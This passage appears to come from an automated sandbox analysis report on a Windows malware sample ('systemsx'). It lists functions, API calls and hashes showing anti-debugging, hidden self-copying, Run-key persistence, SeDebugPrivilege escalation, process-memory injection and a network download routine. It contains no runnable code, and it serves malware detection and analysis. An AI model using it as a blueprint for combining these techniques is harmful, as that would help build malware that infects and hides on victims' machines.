                                                                                                                                                                                                                          • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 434396405-0
                                                                                                                                                                                                                          • Opcode ID: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                                          • Instruction ID: 7f14b8407257b553299f0ab6276800ed14a495fabf5b6bee14df2c4f4c7458dc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C31C73261868186D760EF66E490A2EF7A0FBC4B84F909135FA8E47B68DF7CD455CB10
                                                                                                                                                                                                                          Function 00007FF79483321C Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3920101602-0
                                                                                                                                                                                                                          • Opcode ID: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                                          • Instruction ID: 779574a36404a7db5b7f0526e0601f88c00b452f35439808c92d34de9802ad6b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77F05E3090C28381F730AF7BA444779E790AF45B0AF808174D98D07594DF6CE629DB31
                                                                                                                                                                                                                          Function 00007FF7948338C4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF794833784
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833744: GetVolumeInformationW.KERNELBASE ref: 00007FF794833801
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833744: wsprintfW.USER32 ref: 00007FF7948338A2
                                                                                                                                                                                                                          • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF79483390D
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833922
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833935
                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833945
                                                                                                                                                                                                                          • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833958
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF79483396D
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833980
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833995
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: .exe
                                                                                                                                                                                                                          • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                          • Opcode ID: ad427c8d5848fc1249d0a57c1c2e5cab76719b9f7eb05ae4e82a907526b46e72
                                                                                                                                                                                                                          • Instruction ID: d92f0c2fbb56c4b36f610a5e89522e3b5a32d63e4cd88e61b8805573f9ee347f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad427c8d5848fc1249d0a57c1c2e5cab76719b9f7eb05ae4e82a907526b46e72
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA11F47562898695DB70AF3AF894BAAA361FBC4B84F80D031D94E43A29EE3DD415C710
                                                                                                                                                                                                                          Function 00007FF794833A74 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF794833784
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833744: GetVolumeInformationW.KERNELBASE ref: 00007FF794833801
                                                                                                                                                                                                                            • Part of subcall function 00007FF794833744: wsprintfW.USER32 ref: 00007FF7948338A2
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF79483390D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833922
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833935
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833945
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833958
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF79483396D
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833980
                                                                                                                                                                                                                            • Part of subcall function 00007FF7948338C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF794833AA9), ref: 00007FF794833995
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32 ref: 00007FF794833AB9
                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE ref: 00007FF794833AC4
                                                                                                                                                                                                                          • CopyFileW.KERNELBASE ref: 00007FF794833ADD
                                                                                                                                                                                                                          • SetFileAttributesW.KERNELBASE ref: 00007FF794833AF5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: Services
                                                                                                                                                                                                                          • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                          • Opcode ID: be0043b295d9898150489b8ba5340aa22ed2e55b609d377a08c94104789181f7
                                                                                                                                                                                                                          • Instruction ID: a02f3ce1acc62e4c75ee1cfb73f0b1b05c11ea3ce02ff138b768f3099c433540
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be0043b295d9898150489b8ba5340aa22ed2e55b609d377a08c94104789181f7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C018471A1898692EB70EF35E4947AA9360FB94744FC0C432D64E835A8EF2CD259CB10
                                                                                                                                                                                                                          Function 00007FF794833744 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                          • API String ID: 3001812590-640692576
                                                                                                                                                                                                                          • Opcode ID: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                                          • Instruction ID: 468f9866ae5bb34b81d1bce3423cf9a8276083ead9fb9d5162dfa1d5a5c74937
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7631073661C6C286DB30EF75E4987AAB3A0FB84700F805136E68D87A58EB7DC559CB10
                                                                                                                                                                                                                          Function 00007FF7948339B4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                          • API String ID: 779948276-1428018034
                                                                                                                                                                                                                          • Opcode ID: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                                                                          • Instruction ID: fe56093c04b1eb0ecefe6b5acd3209b117b20bdc437ba03f0be79d527c11df90
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fdf8a34efa352080ba6f6553334769d4c7d7706005dac43f85eff4b5ffc39d8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E115432518A4186E7609F25F480A2AB7A0F7847A0F509330F9AE43BA8DF6CD094CB10
                                                                                                                                                                                                                          Function 00007FF794831050 Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 422 7ff794831050-7ff79483108c LoadLibraryA GetProcAddress
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2574300362-0
                                                                                                                                                                                                                          • Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                          • Instruction ID: 1c12e93357fdfd5e6f4036f8a9c738ffc601b2d0365132bf737aa98445d39464
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7E09276508F8486C660AF15F89001AB7B4FBC8794F908125EACD43B28DF3CC165CB00
                                                                                                                                                                                                                          Function 00007FF794833B24 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 423 7ff794833b24-7ff794833b33 424 7ff794833b48-7ff794833b4c 423->424 425 7ff794833b35-7ff794833b42 VirtualFree 423->425 425->424
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                          • Opcode ID: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                                          • Instruction ID: 9fd845eb7110d8bdd5a3d120b7e80a785b9b9eca0879ba372d36af13753755ae
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DD0C921E3898281E7A4AB27E889B19A2A0FBC4B44F80C035E68942564CE3CC4A9CB00
                                                                                                                                                                                                                          Function 00007FF794833B54 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 426 7ff794833b54-7ff794833b7a VirtualAlloc
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                          • Opcode ID: b541e8117daad4751c7a279db5381b441ce47fb4f749190da09f5cfabf446e69
                                                                                                                                                                                                                          • Instruction ID: 8860ded7473fce8a825a901adac9b0620098545ea3479f281618adf06ad1a223
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b541e8117daad4751c7a279db5381b441ce47fb4f749190da09f5cfabf446e69
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90C080B1F25140C3D71DDF32E491F0F6A10B744740F90C028DA0147744C93DC5518F00

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Function 00007FF794831CDC Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF794831D19
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                          • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                          • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                          • Opcode ID: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                                                                          • Instruction ID: 0823c0857c02d9770c2879f9c2bf4104920c9c54649cd6d37448c2dd34884fae
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B471FA32518A8182E760EF66F494B2AF760FBC4B94F909035FA8E43A68DF7CD454CB50
                                                                                                                                                                                                                          Function 00007FF7948340E4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
                                                                                                                                                                                                                          • String ID: SeDebugPrivilege
                                                                                                                                                                                                                          • API String ID: 2379135442-2896544425
                                                                                                                                                                                                                          • Opcode ID: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                                                                          • Instruction ID: 121184506f2a9b5cc337971afa69e373a14ee45b59ca0fae3e2b95b9fbd49038
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47415E32618A8186E770DF62F484B6EF7A0FB84B54F908135EA8947A98DF7DD458CF10
                                                                                                                                                                                                                          Function 00007FF794832CB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82memoryinjectionCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Virtual$AllocMemoryProcessProtectWrite
                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                          • API String ID: 4073123320-2766056989
                                                                                                                                                                                                                          • Opcode ID: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                                                                          • Instruction ID: 9735732029ac5bfb8dc555254883e28cdcf1f02f4ac490e4899bb19f6cc1339a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4641B332A08B8586E770DF26F49476AB7A0F784B84F508125EACD83B98DF7DE454CB40
                                                                                                                                                                                                                          Function 00007FF794834004 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000001.00000002.2047705510.00007FF794831000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF794830000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047655756.00007FF794830000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047771086.00007FF794835000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047800354.00007FF794837000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047822178.00007FF794838000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000001.00000002.2047932698.00007FF79483A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff794830000_systemsx.jbxd
